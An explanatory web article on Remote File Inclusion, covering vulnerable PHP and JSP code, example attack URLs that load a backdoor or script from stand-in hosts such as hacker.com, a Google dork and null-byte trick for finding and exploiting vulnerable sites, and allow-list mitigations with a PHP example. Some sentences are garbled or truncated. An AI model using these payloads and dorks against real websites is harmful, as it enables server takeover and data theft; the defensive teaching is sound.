What is Remote File Inclusion?
Remote File Inclusion (RFI) is an attack that targets vulnerabilities in web applications that dynamically reference external scripts. The attacker exploits an application's referencing function to load malware from a remote URL. Successful RFI attacks lead to compromised servers and information theft. They also allow site takeovers that permit modification of content.
Remote Inclusion Vulnerability Examples: RFI Examples
The following RFI examples demonstrate the vulnerability:
- A JSP page containing this line of code: can be manipulated with the following request: Page1.jsp?ParamName=/WEB-INF/DB/password. Processing the request discloses the content of the password file to the perpetrator.
- An import statement in a web application requests content from a URL address. If unsanitized, this statement can be used to inject malware. For example: Page2.jsp?conf=https://evilsite.com/attack.js
- RFI attacks are usually launched by manipulating request parameters to point to remote malicious files. Consider the following code as an example:
Remote File Inclusion PHP
$incfile = $_REQUEST['file'];
include($incfile . ".php");
The first line extracts the HTTP file parameter value, and the second line uses that value to dynamically set the file name. If the file parameter value is not properly sanitized, this code can be exploited for unauthorized file uploads.
For example, this URL string http://www.example.com/vuln_page.php?file=http://www.hacker.com/backdoor_ contains an external reference to a backdoor file stored in a remote location (http://www.hacker.com/backdoor_shell.php).
Once it has been uploaded to the application, this backdoor can be used to access the application database or hijack the underlying server.
What is RFI?
A remote file include works by passing a string containing the URL of the file to an include function of the language in use. The website being attacked then requests the remote file and fetches its contents, which the parser of that language then processes.
A developer might want to include a local file based on the GET parameter page. There are three files: main.php and contact.php. Each file provides different functionality to the website. The following query can be used to call each file:
https://example.com/index.php?page=contact.php
The developer assumes that only files within that folder will be included, but an attacker could include files from other directories (LFI) or from a remote server (RFI). Without a whitelist, an attacker can change the file path passed to the include function of the programming language. The attacker can include a local file, but can also change the path to a file that resides on their own server. This allows malicious code to be written in a file without needing to inject code into the web server or poison logs.
The impact of an exploited RFI vulnerability depends on the execution rights of the web server user. Any included source code is executed with the privileges granted to the current web server user, which allows arbitrary code execution. If the web server user has administrative privileges, a full system compromise can also be achieved.
RFI allows you to deface a website
RFI is a vulnerability that allows an attacker to upload malicious code to a website or server. Not all website hacking attacks are about SQL injection; RFI can also be used to hack websites and gain access to the server. Hacking a server or website this way requires first finding an RFI-vulnerable website. Start by:
- Go to Google and search for the following query. inurl: “index.php?page=home”
- You can also visit other pages such as galleries or products from the same place.
- Google is not required to find RFI-vulnerable websites if you already know about them.
RFI PHP
Three things could happen if it’s a truly vulnerable website.
- The URL containing “page=home”, without an extension, will be obvious. If you include an extension in the URL, the site may actually give an error like ‘failure to include maliciousScript.txt’. This could happen because the site might be adding the .txt extension automatically to pages stored on a server.
- To avoid errors, if it adds something to the lines of PHP, we must use the null byte “%00”.
- Execution success
Remote File Inclusion (RFI), Prevention and Mitigation
Remote inclusion is a language feature that can be abused to exploit RFI vulnerabilities, so you should disable it in your programming language's configuration. In PHP, set allow_url_include to ‘0’. Verify user input before passing it to an include function; this is best done with a whitelist.
Proper input validation and sanitization reduce the risk of RFI attacks. It is important to remember, however, that not all inputs can be sanitized, so sanitization should not be used as a replacement for a real security solution. It is still better to sanitize user-supplied/controlled inputs to the best of your capability. These inputs are:
- URL parameters
- Cookie values
- GET/POST parameters
- HTTP header values
Input fields must be checked against a whitelist during the sanitization process. Blacklist validation is considered weak because attackers can provide input in a different format, such as hexadecimal or other encoded formats. It is also a good idea to use output validation mechanisms at the server end. Client-side validation functions have the advantage of reducing processing overhead, but they can be attacked with proxy tools.
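The whitelist check before the include function and the allow_url_include setting described in this section, as an added PHP example that is not part of the original article. The PAGES table, the PAGE_DIR directory and the function names are assumptions, and the sample inputs are constructed (the hostile ones reuse strings quoted earlier on this page).

```php
<?php
declare(strict_types=1);

// Allow-list: the only page names the application serves, mapped to fixed
// files. File names come from the article; the directory is an assumption.
const PAGES = [
    'main'    => 'main.php',
    'contact' => 'contact.php',
];
const PAGE_DIR = __DIR__ . '/pages';

// Returns the absolute path to include, or null if the request is rejected.
function resolve_page(mixed $requested): ?string
{
    // Arrays (?page[]=x) and other non-strings never match the allow-list.
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        return null;
    }
    // The path is built from the constant table, never from user input.
    return PAGE_DIR . '/' . PAGES[$requested];
}

// Defence in depth: report when remote includes are enabled in php.ini.
function remote_include_enabled(): bool
{
    return filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN);
}

// Constructed sample inputs; only the first one is an allow-listed name.
$samples = [
    'contact',
    'contact.php',                           // file name, not a page name
    'http://www.hacker.com/backdoor_shell',  // remote reference
    '/WEB-INF/DB/password',                  // path outside the page folder
    "main\0.txt",                            // embedded null byte
    ['main'],                                // array instead of string
];

if (remote_include_enabled()) {
    error_log('allow_url_include is on; set it to 0 in php.ini');
}
foreach ($samples as $s) {
    $path = resolve_page($s);
    printf("%-45s => %s\n", json_encode($s, JSON_UNESCAPED_SLASHES), $path ?? 'REJECTED');
    // In the application: if ($path === null) { http_response_code(404); exit; }
    //                     include $path;
}
```

Because the included path is looked up by exact key rather than filtered, re-encoded or case-changed variants of a rejected value are rejected as well.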
Last tip: Always consider restricting permissions for upload directories. Also, make sure you have a whitelist of allowed file types and limit uploaded file sizes.